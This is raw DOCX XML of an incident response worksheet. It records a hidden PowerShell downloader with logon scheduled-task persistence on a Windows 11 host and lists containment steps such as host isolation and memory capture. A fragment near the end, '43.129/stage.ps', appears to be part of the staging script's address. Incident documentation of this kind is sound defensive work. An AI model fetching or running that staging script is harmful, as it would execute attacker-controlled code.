            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>musa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Ahmad Alkufahy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F426CE" w:rsidRPr="00F426CE" w14:paraId="63D7823A" w14:textId="77777777" w:rsidTr="00F426CE">
        <w:trPr>
          <w:trHeight w:val="1502"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3408" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F559340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2. What</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5682" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="00FED685" w14:textId="2AD45102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[Hidden PowerShell downloader + logon scheduled task; confirmed facts]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F426CE" w:rsidRPr="00F426CE" w14:paraId="4C23FE45" w14:textId="77777777" w:rsidTr="00F426CE">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3408" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5DABE341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3. When</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5682" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="263A1BF1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Detection time, earliest known activity, latest observed activity; timezone.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F426CE" w:rsidRPr="00F426CE" w14:paraId="1017CD61" w14:textId="77777777" w:rsidTr="00F426CE">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3408" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1BDE885E" w14:textId="77777777" w:rsidR="00F426CE" w:rsidRPr="00F426CE" w:rsidRDefault="00F426CE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4. Where</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5682" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="432235D2" w14:textId="64493327" w:rsidR="00F426CE" w:rsidRPr="00F426CE" w:rsidRDefault="00F426CE" w:rsidP="00F426CE">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F426CE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Affected host: </w:t>
            </w:r>
            <w:r w:rsidRPr="00F426CE">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>windows11-host</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00F426CE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>user:</w:t>
            </w:r>
            <w:r w:rsidRPr="00F426CE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F426CE">
              <w:t>akufa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00F426CE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>criticality:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> High</w:t>
            </w:r>
            <w:r w:rsidRPr="00F426CE">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00380824" w:rsidRPr="00F426CE" w14:paraId="3728C964" w14:textId="77777777" w:rsidTr="00F426CE">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3408" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C2EBF14" w14:textId="77777777" w:rsidR="00380824" w:rsidRPr="00F426CE" w:rsidRDefault="00380824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5. Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5682" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28654EFD" w14:textId="4439F9D8" w:rsidR="00380824" w:rsidRPr="00380824" w:rsidRDefault="00380824" w:rsidP="00380824">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00380824">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Potential unauthorized code execution and persistence on the affected host</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F426CE">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00380824" w:rsidRPr="00F426CE" w14:paraId="0D6640CA" w14:textId="77777777" w:rsidTr="00F426CE">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3408" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="32C2DD1E" w14:textId="77777777" w:rsidR="00380824" w:rsidRPr="00F426CE" w:rsidRDefault="00380824">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F426CE">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6. Action / assistance needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5682" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6A020489" w14:textId="77777777" w:rsidR="00380824" w:rsidRDefault="00380824" w:rsidP="00380824">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="1440"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6532ADDB" w14:textId="3B9BFB3C" w:rsidR="00380824" w:rsidRPr="00380824" w:rsidRDefault="00380824" w:rsidP="0038082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 w:rsidRPr="00380824">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Isolate host</w:t>
            </w:r>
            <w:r w:rsidRPr="00380824">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
          <w:p w14:paraId="37F63C6B" w14:textId="51C7A651" w:rsidR="00380824" w:rsidRPr="00380824" w:rsidRDefault="00380824" w:rsidP="0038082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17"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00380824">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>disable task</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E084161" w14:textId="77777777" w:rsidR="00380824" w:rsidRPr="00F426CE" w:rsidRDefault="00380824" w:rsidP="00F426CE">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="78A98EED" w14:textId="47BB2724" w:rsidR="00380824" w:rsidRPr="00380824" w:rsidRDefault="00380824" w:rsidP="00380824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 w:rsidRPr="00380824">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>memory capture</w:t>
            </w:r>
            <w:r w:rsidRPr="00380824">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="26D04945" w14:textId="77777777" w:rsidR="00D30D50" w:rsidRPr="00F426CE" w:rsidRDefault="00D30D50">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F310D19" w14:textId="545536B5" w:rsidR="00D30D50" w:rsidRPr="00F426CE" w:rsidRDefault="00D30D50">
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00D30D50" w:rsidRPr="00F426CE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4EE7" w14:textId="77777777" w:rsidR="007D77DE" w:rsidRDefault="007D77DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3335B93B" w14:textId="77777777" w:rsidR="007D77DE" w:rsidRDefault="007D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F5A43" w14:textId="77777777" w:rsidR="00D30D50" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>Incident Response Worksheet | Handle evidence according to organizational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493E1" w14:textId="77777777" w:rsidR="007D77DE" w:rsidRDefault="007D77DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="30C75F0D" w14:textId="77777777" w:rsidR="007D77DE" w:rsidRDefault="007D7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346D7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B1F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220B4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C5E8E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110FC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8FDA3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13681"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="733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167324">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1959750959">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1210069291">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="658654528">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1986231372">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1053093">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1272085377">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="961613979">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="681712443">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="2057853375">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="208419165">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="834875605">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1922371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824"/>
    <w:rsid w:val="007D77DE"/>
    <w:rsid w:val="009770B3"/>
    <w:rsid w:val="009E3FCD"/>
    <w:rsid w:val="00AA1D8D"/>
    <w:rsid w:val="00B47730"/>
    <w:rsid w:val="00C263AA"/>
    <w:rsid w:val="00CB0664"/>
    <w:rsid w:val="00D30D50"/>
    <w:rsid w:val="00DA113F"/>
    <w:rsid w:val="00F42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E586E"/>
  <w14:defaultImageDpi w14:val="300"/>
  <w15:docId w15:val="{D4A190B8-DBEF-4E8F-BAC4-86F6AAE6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E3F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43.129/stage.ps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حسن رفعت النابلسي</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-27T09:23:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>